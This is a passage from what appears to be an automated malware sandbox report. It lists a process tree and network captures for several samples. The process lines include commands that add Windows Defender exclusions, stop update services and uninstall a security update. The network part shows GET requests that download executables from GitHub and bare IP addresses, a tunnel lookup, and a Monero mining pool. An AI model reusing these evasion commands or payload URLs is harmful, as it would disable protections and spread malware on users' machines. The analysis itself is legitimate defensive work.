  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5552
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4112
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2820
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5800
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5056
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5760
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3492
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4628
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1252
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1528
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1728
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5232
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5196
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5424
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5312
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5580
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5404
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5516
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5272
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:4752
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1576

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:388

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:3888

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:1164

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:3980

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2592

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5744

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:7028

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5412 -ip 5412
1⤵
PID:6116

C:\ProgramData\Screenshots\Lightshot.exe
C:\ProgramData\Screenshots\Lightshot.exe
1⤵
PID:5168
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:848
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:6808
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3588
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1432
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:6892
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3700
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:6164
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:3104
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:4056
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:6180
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4488
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:1692

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6948 -ip 6948
1⤵
PID:6796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 6676 -ip 6676
1⤵
PID:6352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5960 -ip 5960
1⤵
PID:6524

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3776

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8128

Network

DNS

180.129.81.91.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

180.129.81.91.in-addr.arpa

IN PTR

Response
DNS

85.49.80.91.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

85.49.80.91.in-addr.arpa

IN PTR

Response
DNS

raw.githubusercontent.com

NetworkService

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.109.133
DNS

49.194.101.151.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

49.194.101.151.in-addr.arpa

IN PTR

Response
DNS

88.92.177.195.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

88.92.177.195.in-addr.arpa

IN PTR

Response
DNS

ocsp.digicert.com

NetworkService

Remote address:

8.8.8.8:53

Request

ocsp.digicert.com

IN A

Response

ocsp.digicert.com

IN CNAME

ocsp.edge.digicert.com

ocsp.edge.digicert.com

IN CNAME

fp2e7a.wpc.2be4.phicdn.net

fp2e7a.wpc.2be4.phicdn.net

IN CNAME

fp2e7a.wpc.phicdn.net

fp2e7a.wpc.phicdn.net

IN A

192.229.221.95
DNS

0.tcp.in.ngrok.io

NetworkService

Remote address:

8.8.8.8:53

Request

0.tcp.in.ngrok.io

IN A

Response

0.tcp.in.ngrok.io

IN A

13.127.206.16
DNS

other-little.gl.at.ply.gg

NetworkService

Remote address:

8.8.8.8:53

Request

other-little.gl.at.ply.gg

IN A

Response

other-little.gl.at.ply.gg

IN A

147.185.221.25
DNS

freedns.afraid.org

NetworkService

Remote address:

8.8.8.8:53

Request

freedns.afraid.org

IN A

Response

freedns.afraid.org

IN A

69.42.215.252
DNS

api.ipify.org

NetworkService

Remote address:

8.8.8.8:53

Request

api.ipify.org

IN A

Response

api.ipify.org

IN A

104.26.13.205

api.ipify.org

IN A

104.26.12.205

api.ipify.org

IN A

172.67.74.152
DNS

c.pki.goog

NetworkService

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.178.3
DNS

173.187.63.66.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

173.187.63.66.in-addr.arpa

IN PTR

Response
DNS

3.178.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

3.178.250.142.in-addr.arpa

IN PTR

Response

3.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f31e100net
DNS

clientservices.googleapis.com

NetworkService

Remote address:

8.8.8.8:53

Request

clientservices.googleapis.com

IN A

Response

clientservices.googleapis.com

IN A

142.250.178.3
DNS

174.117.168.52.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

174.117.168.52.in-addr.arpa

IN PTR

Response
DNS

www.google.com

NetworkService

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
DNS

clients2.google.com

NetworkService

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

142.250.187.238
DNS

238.187.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

238.187.250.142.in-addr.arpa

IN PTR

Response

238.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f141e100net
DNS

pool.supportxmr.com

NetworkService

Remote address:

8.8.8.8:53

Request

pool.supportxmr.com

IN A

Response

pool.supportxmr.com

IN CNAME

pool-fr.supportxmr.com

pool-fr.supportxmr.com

IN A

141.94.96.195

pool-fr.supportxmr.com

IN A

141.94.96.144

pool-fr.supportxmr.com

IN A

141.94.96.71
DNS

drive.google.com

NetworkService

Remote address:

8.8.8.8:53

Request

drive.google.com

IN A

Response

drive.google.com

IN A

172.217.169.78
DNS

workspace.google.com

NetworkService

Remote address:

8.8.8.8:53

Request

workspace.google.com

IN A

Response

workspace.google.com

IN A

142.250.200.46
DNS

84.173.251.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

84.173.251.142.in-addr.arpa

IN PTR

Response

84.173.251.142.in-addr.arpa

IN PTR

wi-in-f841e100net
DNS

storage.googleapis.com

NetworkService

Remote address:

8.8.8.8:53

Request

storage.googleapis.com

IN A

Response

storage.googleapis.com

IN A

142.250.179.251

storage.googleapis.com

IN A

172.217.169.91

storage.googleapis.com

IN A

216.58.212.251

storage.googleapis.com

IN A

142.250.178.27

storage.googleapis.com

IN A

216.58.212.219

storage.googleapis.com

IN A

172.217.16.251

storage.googleapis.com

IN A

216.58.213.27

storage.googleapis.com

IN A

142.250.187.219

storage.googleapis.com

IN A

142.250.200.59

storage.googleapis.com

IN A

142.250.187.251

storage.googleapis.com

IN A

216.58.201.123

storage.googleapis.com

IN A

172.217.169.27

storage.googleapis.com

IN A

142.250.200.27

storage.googleapis.com

IN A

142.250.180.27

storage.googleapis.com

IN A

216.58.204.91
DNS

storage.googleapis.com

NetworkService

Remote address:

8.8.8.8:53

Request

storage.googleapis.com

IN A

Response

storage.googleapis.com

IN A

216.58.201.123

storage.googleapis.com

IN A

216.58.212.251

storage.googleapis.com

IN A

216.58.213.27

storage.googleapis.com

IN A

142.250.187.219

storage.googleapis.com

IN A

142.250.179.251

storage.googleapis.com

IN A

142.250.200.59

storage.googleapis.com

IN A

172.217.169.91

storage.googleapis.com

IN A

216.58.212.219

storage.googleapis.com

IN A

216.58.204.91

storage.googleapis.com

IN A

172.217.169.27

storage.googleapis.com

IN A

142.250.187.251

storage.googleapis.com

IN A

142.250.180.27

storage.googleapis.com

IN A

142.250.200.27

storage.googleapis.com

IN A

172.217.16.251

storage.googleapis.com

IN A

142.250.178.27
GET

https://urlhaus.abuse.ch/downloads/text_online/

._cache_New Text Document mod.exe

Remote address:

151.101.194.49:443

Request

GET /downloads/text_online/ HTTP/1.1
Host: urlhaus.abuse.ch
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 635341
Server: Apache
Strict-Transport-Security: max-age=15768000 ; includeSubDomains
Expect-CT: enforce, max-age=86400
Permissions-Policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), speaker=(), usb=(), vr=()
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443 https://hcaptcha.com https://*.hcaptcha.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443 https://hcaptcha.com https://*.hcaptcha.com; frame-src https://www.google.com/recaptcha/ https://hcaptcha.com https://*.hcaptcha.com; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none';
Cross-Origin-Opener-Policy: same-origin; report-to="default"
Cross-Origin-Resource-Policy: same-site
Last-Modified: Mon, 13 Jan 2025 18:00:40 GMT
ETag: "9b1cd-62b9a38e8e0c3"
Cache-Control: max-age=300
Expires: Mon, 13 Jan 2025 18:06:55 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Content-Type: text/plain
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Mon, 13 Jan 2025 18:02:25 GMT
Age: 30
X-Served-By: cache-fra-eddf8230087-FRA, cache-lcy-eglc8600072-LCY
X-Cache: HIT, HIT
X-Cache-Hits: 191, 8
X-Timer: S1736791345.225029,VS0,VE0
Vary: Accept-Encoding
GET

https://raw.githubusercontent.com/andresberejno/aaaaaaa/refs/heads/main/Client-base.exe

._cache_New Text Document mod.exe

Remote address:

185.199.111.133:443

Request

GET /andresberejno/aaaaaaa/refs/heads/main/Client-base.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 3266048
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "2122574f0b8bcbc44029de54315c2ba7776e997e93350eee5b3698d70094447f"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 5E62:37F6DF:60A1B0:80405F:67855412
Accept-Ranges: bytes
Date: Mon, 13 Jan 2025 18:02:25 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600064-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1736791346.534356,VS0,VE6
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 9870159e57d9dade210960448b7b3b865e123649
Expires: Mon, 13 Jan 2025 18:07:25 GMT
Source-Age: 287
GET

https://urlhaus.abuse.ch/downloads/text_online/

._cache_Synaptics.exe

Remote address:

151.101.194.49:443

Request

GET /downloads/text_online/ HTTP/1.1
Host: urlhaus.abuse.ch
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 635341
Server: Apache
Strict-Transport-Security: max-age=15768000 ; includeSubDomains
Expect-CT: enforce, max-age=86400
Permissions-Policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), speaker=(), usb=(), vr=()
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443 https://hcaptcha.com https://*.hcaptcha.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443 https://hcaptcha.com https://*.hcaptcha.com; frame-src https://www.google.com/recaptcha/ https://hcaptcha.com https://*.hcaptcha.com; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none';
Cross-Origin-Opener-Policy: same-origin; report-to="default"
Cross-Origin-Resource-Policy: same-site
Last-Modified: Mon, 13 Jan 2025 18:00:40 GMT
ETag: "9b1cd-62b9a38e8e0c3"
Cache-Control: max-age=300
Expires: Mon, 13 Jan 2025 18:06:55 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Content-Type: text/plain
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Mon, 13 Jan 2025 18:02:25 GMT
Age: 30
X-Served-By: cache-fra-eddf8230087-FRA, cache-lcy-eglc8600077-LCY
X-Cache: HIT, HIT
X-Cache-Hits: 191, 12
X-Timer: S1736791346.581790,VS0,VE0
Vary: Accept-Encoding
GET

https://raw.githubusercontent.com/dzonicar12332/voidddwareee/refs/heads/main/voidware_loader.exe

._cache_Synaptics.exe

Remote address:

185.199.111.133:443

Request

GET /dzonicar12332/voidddwareee/refs/heads/main/voidware_loader.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 3266048
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "ad8b7a9e32c02ae5188fe15816b0d4e772a8287fa72a73f681ddd7f08d1324ae"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 4E5A:1F1AED:5CAAEA:7C161F:67854ED7
Accept-Ranges: bytes
Date: Mon, 13 Jan 2025 18:02:25 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600060-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1736791346.976555,VS0,VE10
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: d03a30dcc938b63116987a17007fdfa9af9ca421
Expires: Mon, 13 Jan 2025 18:07:25 GMT
Source-Age: 30
GET

http://195.177.92.88/build.exe

._cache_New Text Document mod.exe

Remote address:

195.177.92.88:80

Request

GET /build.exe HTTP/1.1
Host: 195.177.92.88
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Last-Modified: Mon, 13 Jan 2025 03:26:17 GMT
Accept-Ranges: bytes
ETag: "a0ea9e86a65db1:0"
Server: Microsoft-IIS/10.0
Date: Mon, 13 Jan 2025 18:02:26 GMT
Content-Length: 307712
GET

http://66.63.187.250/zmk/gem2.exe

._cache_Synaptics.exe

Remote address:

66.63.187.250:80

Request

GET /zmk/gem2.exe HTTP/1.1
Host: 66.63.187.250
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:02:28 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Thu, 09 Jan 2025 17:31:21 GMT
ETag: "2be400-62b4958b77c51"
Accept-Ranges: bytes
Content-Length: 2876416
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET

https://urlhaus.abuse.ch/downloads/text_online/

._cache_New Text Document mod.exe

Remote address:

151.101.194.49:443

Request

GET /downloads/text_online/ HTTP/1.1
Host: urlhaus.abuse.ch
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 635341
Server: Apache
Strict-Transport-Security: max-age=15768000 ; includeSubDomains
Expect-CT: enforce, max-age=86400
Permissions-Policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), speaker=(), usb=(), vr=()
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443 https://hcaptcha.com https://*.hcaptcha.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443 https://hcaptcha.com https://*.hcaptcha.com; frame-src https://www.google.com/recaptcha/ https://hcaptcha.com https://*.hcaptcha.com; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none';
Cross-Origin-Opener-Policy: same-origin; report-to="default"
Cross-Origin-Resource-Policy: same-site
Last-Modified: Mon, 13 Jan 2025 18:00:40 GMT
ETag: "9b1cd-62b9a38e8e0c3"
Cache-Control: max-age=300
Expires: Mon, 13 Jan 2025 18:06:55 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Content-Type: text/plain
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Mon, 13 Jan 2025 18:02:29 GMT
Age: 34
X-Served-By: cache-fra-eddf8230087-FRA, cache-lcy-eglc8600091-LCY
X-Cache: HIT, HIT
X-Cache-Hits: 191, 17
X-Timer: S1736791350.851439,VS0,VE0
Vary: Accept-Encoding
GET

http://66.63.187.250/zmk/gem1.exe

._cache_New Text Document mod.exe

Remote address:

66.63.187.250:80

Request

GET /zmk/gem1.exe HTTP/1.1
Host: 66.63.187.250
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:02:30 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Thu, 09 Jan 2025 17:20:31 GMT
ETag: "128e00-62b493200aa71"
Accept-Ranges: bytes
Content-Length: 1216000
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET

http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

Synaptics.exe

Remote address:

69.42.215.252:80

Request

GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
User-Agent: MyApp
Host: freedns.afraid.org
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 18:02:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Cache: MISS
GET

http://c.pki.goog/r/gsr1.crl

gem1.exe

Remote address:

142.250.178.3:80

Request

GET /r/gsr1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 1739
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Mon, 13 Jan 2025 17:47:17 GMT
Expires: Mon, 13 Jan 2025 18:37:17 GMT
Cache-Control: public, max-age=3000
Age: 916
Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
GET

http://c.pki.goog/r/r4.crl

gem1.exe

Remote address:

142.250.178.3:80

Request

GET /r/r4.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 436
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Mon, 13 Jan 2025 17:58:41 GMT
Expires: Mon, 13 Jan 2025 18:48:41 GMT
Cache-Control: public, max-age=3000
Age: 232
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
DNS

205.13.26.104.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

205.13.26.104.in-addr.arpa

IN PTR

Response
DNS

self.events.data.microsoft.com

NetworkService

Remote address:

8.8.8.8:53

Request

self.events.data.microsoft.com

IN A

Response

self.events.data.microsoft.com

IN CNAME

self-events-data.trafficmanager.net

self-events-data.trafficmanager.net

IN CNAME

onedscolprdeus22.eastus.cloudapp.azure.com

onedscolprdeus22.eastus.cloudapp.azure.com

IN A

52.168.117.174
DNS

www.googleapis.com

NetworkService

Remote address:

8.8.8.8:53

Request

www.googleapis.com

IN A

Response

www.googleapis.com

IN A

216.58.204.74

www.googleapis.com

IN A

142.250.200.10

www.googleapis.com

IN A

216.58.201.106

www.googleapis.com

IN A

172.217.16.234

www.googleapis.com

IN A

172.217.169.42

www.googleapis.com

IN A

142.250.200.42

www.googleapis.com

IN A

142.250.179.234

www.googleapis.com

IN A

142.250.180.10

www.googleapis.com

IN A

142.250.178.10

www.googleapis.com

IN A

172.217.169.10

www.googleapis.com

IN A

216.58.212.202

www.googleapis.com

IN A

142.250.187.234

www.googleapis.com

IN A

142.250.187.202

www.googleapis.com

IN A

216.58.212.234
DNS

74.204.58.216.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

74.204.58.216.in-addr.arpa

IN PTR

Response

74.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f101e100net

74.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f74�H

74.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f10�H
DNS

clients2.googleusercontent.com

NetworkService

Remote address:

8.8.8.8:53

Request

clients2.googleusercontent.com

IN A

Response

clients2.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.200.33
DNS

33.200.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

33.200.250.142.in-addr.arpa

IN PTR

Response

33.200.250.142.in-addr.arpa

IN PTR

lhr48s30-in-f11e100net
DNS

195.96.94.141.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

195.96.94.141.in-addr.arpa

IN PTR

Response

195.96.94.141.in-addr.arpa

IN PTR

ns31444891ip-141-94-96eu
DNS

accounts.google.com

NetworkService

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.251.173.84
DNS

78.169.217.172.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

78.169.217.172.in-addr.arpa

IN PTR

Response

78.169.217.172.in-addr.arpa

IN PTR

lhr48s09-in-f141e100net
DNS

lh3.googleusercontent.com

NetworkService

Remote address:

8.8.8.8:53

Request

lh3.googleusercontent.com

IN A

Response

lh3.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.200.33
DNS

content-autofill.googleapis.com

NetworkService

Remote address:

8.8.8.8:53

Request

content-autofill.googleapis.com

IN A

Response

content-autofill.googleapis.com

IN A

142.250.187.202

content-autofill.googleapis.com

IN A

216.58.201.106

content-autofill.googleapis.com

IN A

142.250.179.234

content-autofill.googleapis.com

IN A

172.217.169.10

content-autofill.googleapis.com

IN A

172.217.16.234

content-autofill.googleapis.com

IN A

142.250.180.10

content-autofill.googleapis.com

IN A

142.250.187.234

content-autofill.googleapis.com

IN A

142.250.200.10

content-autofill.googleapis.com

IN A

142.250.178.10

content-autofill.googleapis.com

IN A

172.217.169.42

content-autofill.googleapis.com

IN A

